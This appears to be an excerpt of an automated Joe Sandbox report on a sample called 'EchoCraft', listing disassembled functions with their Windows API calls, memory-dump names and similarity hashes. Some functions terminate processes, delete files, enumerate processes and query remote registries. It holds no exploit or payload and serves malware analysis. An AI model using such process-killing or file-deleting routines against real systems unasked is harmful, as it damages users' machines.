GetWindowThreadProcessId.USER32(?,?), ref: 00AEF32C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AEF33B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AEF345
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AEF34C

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 722f74c854777877daf6865026e2646be5a62e12c946c84e773e0a829590ec32
Instruction ID: add1171b4161c166bb5a5d0f0137b855335f910746e8fa65319045a809874f01
Opcode Fuzzy Hash: 722f74c854777877daf6865026e2646be5a62e12c946c84e773e0a829590ec32
Instruction Fuzzy Hash: CCF03A72241158BFE7215BA29C0EEEF7B7CEFC6B11F404068F611A2090DBA46A01C6B5

Function 00AC30BE Relevance: 9.0, APIs: 6, Instructions: 38windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00AC30D7
SendMessageW.USER32(?,00001328,00000000,?), ref: 00AC30EE
GetWindowDC.USER32(?), ref: 00AC30FA
GetPixel.GDI32(00000000,?,?), ref: 00AC3109
ReleaseDC.USER32(?,00000000), ref: 00AC311B
GetSysColor.USER32(00000005), ref: 00AC3135

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: f2e5f5307117457000c8ca176077282c662f26edd932ad52830fe7f09b152299
Instruction ID: 6ff1a12b5ae5628ba094028decf760534c85da8c437e9ae0cf25783120d0aa9e
Opcode Fuzzy Hash: f2e5f5307117457000c8ca176077282c662f26edd932ad52830fe7f09b152299
Instruction Fuzzy Hash: 66012832400205EFDB515F64DC08BE97BB5FB04311F5582A4FA15A31A0CF310E51EB10

Function 00AECD26 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A87A0C: _wcslen.LIBCMT ref: 00A87A11

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AECE44
_wcslen.LIBCMT ref: 00AECE8B
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AECEF2
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00AECF20

Strings

0, xrefs: 00AECE05

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 60c41e008a83a834da1271c6c9bd2d6b3bf6912d6c08fe9116da168b85a4782c
Instruction ID: 22d700c8681ec3213f0f48f92ef999ad9d5f9815228be01ce68799ff61093bec
Opcode Fuzzy Hash: 60c41e008a83a834da1271c6c9bd2d6b3bf6912d6c08fe9116da168b85a4782c
Instruction Fuzzy Hash: 7951E0326183809BD714AF2ACD85B7B7BE9AF46720F040A29F995D31D0EB70CD0AC752

Function 00B0B4E4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00B0B623

Part of subcall function 00A87A0C: _wcslen.LIBCMT ref: 00A87A11

GetProcessId.KERNEL32(00000000), ref: 00B0B6B8
CloseHandle.KERNEL32(00000000), ref: 00B0B6E7

Strings

@, xrefs: 00B0B5F2
<, xrefs: 00B0B5EB

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 40ea84aa6dbc51bf4bf7fd7b473afee0ef6f7f7e4d0f9e9e1ed4be2bbdd3c03d
Instruction ID: 89692a4bde539b67b26602f874fb33de048b2256518ead89d3905f871a5b0801
Opcode Fuzzy Hash: 40ea84aa6dbc51bf4bf7fd7b473afee0ef6f7f7e4d0f9e9e1ed4be2bbdd3c03d
Instruction Fuzzy Hash: 9D713575A00619DFCB14EF54C594A9EBBF0FF08310F048499E866AB292CB75EE45CB94

Function 00AE79BA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AE7A22
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00AE7A58
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00AE7A69
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AE7AEB

Strings

DllGetClassObject, xrefs: 00AE7A5E

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 823f6ea4947cf98d51c46c498e92f921db9b345f778e211cb39b7ccbfd2678b7
Instruction ID: b5095526783ab9cb30bf2ee644279e7a7134034ff05849c317f99f2e7e5a4389
Opcode Fuzzy Hash: 823f6ea4947cf98d51c46c498e92f921db9b345f778e211cb39b7ccbfd2678b7
Instruction Fuzzy Hash: CC418E72605244EFDB15DF55C884A9E7BB9EF44350F1480ADED099F246EBB1DE40CBA0

Function 00B14456 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B1450F
IsMenu.USER32(?), ref: 00B14524
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B1456C
DrawMenuBar.USER32 ref: 00B1457F

Strings

0, xrefs: 00B14463

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 343256b1ea37b613e57313364f6c828e3d44fd0f1dffb721e115802d7d000725
Instruction ID: c50fb394fa05323b8167209551adb8f11adbccdb6994e62e81d018e7fc2ecaf7
Opcode Fuzzy Hash: 343256b1ea37b613e57313364f6c828e3d44fd0f1dffb721e115802d7d000725
Instruction Fuzzy Hash: E1412775A0120AEFDB10CF95E884AEABBFAFB15314F5441A9F9159B250DB30ED80CB90

Function 00AE25E2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A8C110: _wcslen.LIBCMT ref: 00A8C11A

Part of subcall function 00AE44BB: GetClassNameW.USER32(?,?,000000FF), ref: 00AE44DE

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00AE2666
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00AE2679
SendMessageW.USER32(?,00000189,?,00000000), ref: 00AE26A9

Part of subcall function 00A8B0DB: _wcslen.LIBCMT ref: 00A8B0EE

Strings

ListBox, xrefs: 00AE2625
ComboBox, xrefs: 00AE25F0

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 940a4bcc3b0b4f593e11332f2c8f22e170a6a0f569d80ab3f74dd4a5b0333677
Instruction ID: 0330275028851304df90cc9858c83b337a3b9bb425ad55cb45a901e46c1a6b23
Opcode Fuzzy Hash: 940a4bcc3b0b4f593e11332f2c8f22e170a6a0f569d80ab3f74dd4a5b0333677
Instruction Fuzzy Hash: C821F371A00148BFDB04BBA1D88AEFFBBBCEF45360B104219F421971E1DB78494AD720

Function 00B135F1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B13667
LoadLibraryW.KERNEL32(?), ref: 00B1366E
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B13683
DestroyWindow.USER32(?), ref: 00B1368B

Strings

SysAnimate32, xrefs: 00B13642

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 7654a390cf7efb597a440ccb41ac19c4bb23c1a551a24214736b71e3ddf37c61
Instruction ID: ce50a97b1830d5103fa1b6b175885179ea37fc533d7fc3149d874aea271583f5
Opcode Fuzzy Hash: 7654a390cf7efb597a440ccb41ac19c4bb23c1a551a24214736b71e3ddf37c61
Instruction Fuzzy Hash: 7621DC31204205FFEF104FA4DC94EEB37E9EB58B24FA04668FA5493290E731CD909760

Function 00AA518D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00AA513E,00000003,?,00AA50DE,00000003,00B49820,0000000C,00AA5235,00000003,00000002), ref: 00AA51AD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AA51C0
FreeLibrary.KERNEL32(00000000,?,?,?,00AA513E,00000003,?,00AA50DE,00000003,00B49820,0000000C,00AA5235,00000003,00000002,00000000), ref: 00AA51E3

Strings

mscoree.dll, xrefs: 00AA51A6
CorExitProcess, xrefs: 00AA51B8

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c964223bc0852efcfff447f094f2d661b4f65722f7f5d8f51318d50357756550
Instruction ID: 0b284f7685b6cc782164f1c268aa6f1705e9d7d5d98222abf81f35671ac1286d
Opcode Fuzzy Hash: c964223bc0852efcfff447f094f2d661b4f65722f7f5d8f51318d50357756550
Instruction Fuzzy Hash: DBF0C231A00218BBDB14AFA4DC09BEDBFB4EF44712F4041A4FC09A31A0DF308E40CA94

Function 00A8320E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A82BF2,?,?,00A82B95,?,00000001,?,?,00000000), ref: 00A8321A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A8322C
FreeLibrary.KERNEL32(00000000,?,?,00A82BF2,?,?,00A82B95,?,00000001,?,?,00000000), ref: 00A8323E

Strings

Wow64DisableWow64FsRedirection, xrefs: 00A83226
kernel32.dll, xrefs: 00A83212

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 4225f5afe691c6cef0ffcf89f267a86a38e78da00bdf2f8130fdc1ce8c353c7a
Instruction ID: 1316184c67d8d6ca9a1bdc60057074d621d6386aa1c63cc7325c864541ad6db7
Opcode Fuzzy Hash: 4225f5afe691c6cef0ffcf89f267a86a38e78da00bdf2f8130fdc1ce8c353c7a
Instruction Fuzzy Hash: A2E0C237602632778B222715AC08BEEA658AFE2F227454055FC00F3224EF64CE1186F0

Function 00A831D7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AC3B55,?,?,00A82B95,?,00000001,?,?,00000000), ref: 00A831E0
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A831F2
FreeLibrary.KERNEL32(00000000,?,?,00AC3B55,?,?,00A82B95,?,00000001,?,?,00000000), ref: 00A83205

Strings

kernel32.dll, xrefs: 00A831D9
Wow64RevertWow64FsRedirection, xrefs: 00A831EC

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 15bfa6d0cf048e9a1679df2d2643cf0275bdbbedb12cc1df1b5298a421f0df03
Instruction ID: 0131f22e4aafab6a143e12bb84332972d78499954391274411aac57176cf3dfa
Opcode Fuzzy Hash: 15bfa6d0cf048e9a1679df2d2643cf0275bdbbedb12cc1df1b5298a421f0df03
Instruction Fuzzy Hash: 84D01236A02531675A3337256C28FCE6E54AE91F613454055F814B7128EF24CE158694

Function 00AF31D8 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AF3496
DeleteFileW.KERNEL32(?), ref: 00AF3518
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00AF352E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AF353F
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AF3551

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: d5f587ee05ac400d8d1044846e3a5197784f6c11c475be8125ed631919165d3f
Instruction ID: fc4a9c0a79446a4d5be612effda48ef5badc6e85f0c623bbb81b646c3575ad6c
Opcode Fuzzy Hash: d5f587ee05ac400d8d1044846e3a5197784f6c11c475be8125ed631919165d3f
Instruction Fuzzy Hash: FFB14C7290011DAFDF15EBA4CD85EEEBBBDEF49350F0041A6F60AA7141EB309B458B61

Function 00B0AAF9 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00B0AB99
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B0ABA7
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B0ABDA
CloseHandle.KERNEL32(?), ref: 00B0ADAF

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: b13cf145af8f667d9b2a4a42c8a8b988dd040268d1cfb8668059995aeda66f15
Instruction ID: 446be5738c8bbe72759d63299a79d0c294026d45458ac044113818d246e5e0d3
Opcode Fuzzy Hash: b13cf145af8f667d9b2a4a42c8a8b988dd040268d1cfb8668059995aeda66f15
Instruction Fuzzy Hash: 8BA17071604301AFD720EF28C982F2ABBE5EF48710F14895DF5999B6D2DB70EC418B92

Function 00B0ADEE Relevance: 7.7, APIs: 5, Instructions: 181processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00B0AE1E
Process32FirstW.KERNEL32(00000000,?), ref: 00B0AE2C

Part of subcall function 00A8C110: _wcslen.LIBCMT ref: 00A8C11A

CompareStringW.KERNEL32(00000400,00000001,?,?,?,?,?), ref: 00B0AEB0
Process32NextW.KERNEL32(00000000,?), ref: 00B0AF18
CloseHandle.KERNEL32(00000000), ref: 00B0AF2A

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: d0d6eae3601cd31c86256842f52e8f6ed0b05a3cc07b00a46b52e13fea7f4fb9
Instruction ID: 4d5d0aa4a458a24c2454ddbe2a15cf3cb445e53954f47c905d452a35a22fcc5e
Opcode Fuzzy Hash: d0d6eae3601cd31c86256842f52e8f6ed0b05a3cc07b00a46b52e13fea7f4fb9
Instruction Fuzzy Hash: C36179B1608311AFD310EF24D986EABBBE8FF88714F00495DF59597291EB70E904CB92

Function 00B0C149 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A8C110: _wcslen.LIBCMT ref: 00A8C11A

Part of subcall function 00B0D11B: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0BE2E,?,?), ref: 00B0D138
Part of subcall function 00B0D11B: _wcslen.LIBCMT ref: 00B0D174
Part of subcall function 00B0D11B: _wcslen.LIBCMT ref: 00B0D1E2
Part of subcall function 00B0D11B: _wcslen.LIBCMT ref: 00B0D218

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B0C225
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B0C280
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B0C2E3
RegCloseKey.ADVAPI32(?,?), ref: 00B0C326
RegCloseKey.ADVAPI32(00000000), ref: 00B0C333

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: ab80b1bc84b6773f85582f2c0a4b986bf2bbab52e12178ca515f52b94b7fdd7f
Instruction ID: 54309343614cca93f82a40021998dc53717bc12a1afa5957b84d498b36497722
Opcode Fuzzy Hash: ab80b1bc84b6773f85582f2c0a4b986bf2bbab52e12178ca515f52b94b7fdd7f
Instruction Fuzzy Hash: 8A618131208241AFD714DF54C494E6ABFE5FF84308F54859CF49A4B2A2DB31ED45CB92

Function 00AEEBD2 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00AEE5A9: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AED678,?), ref: 00AEE5C6

Part of subcall function 00AEE5A9: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AED678,?), ref: 00AEE5DF

Part of subcall function 00AEE970: GetFileAttributesW.KERNEL32(?,00AED6EB), ref: 00AEE971

lstrcmpiW.KERNEL32(?,?), ref: 00AEEC4A
MoveFileW.KERNEL32(?,?), ref: 00AEEC83
_wcslen.LIBCMT ref: 00AEEDC2
_wcslen.LIBCMT ref: 00AEEDDA
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00AEEE27

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 840cad3d4da5bcceeb428ae24a164c22d1ccb4d65bfc64ec8191bff11c839a07
Instruction ID: 712468a715e94fc125f7c1ccd2f2b069965e84aeae28105b65f13af852141c12
Opcode Fuzzy Hash: 840cad3d4da5bcceeb428ae24a164c22d1ccb4d65bfc64ec8191bff11c839a07
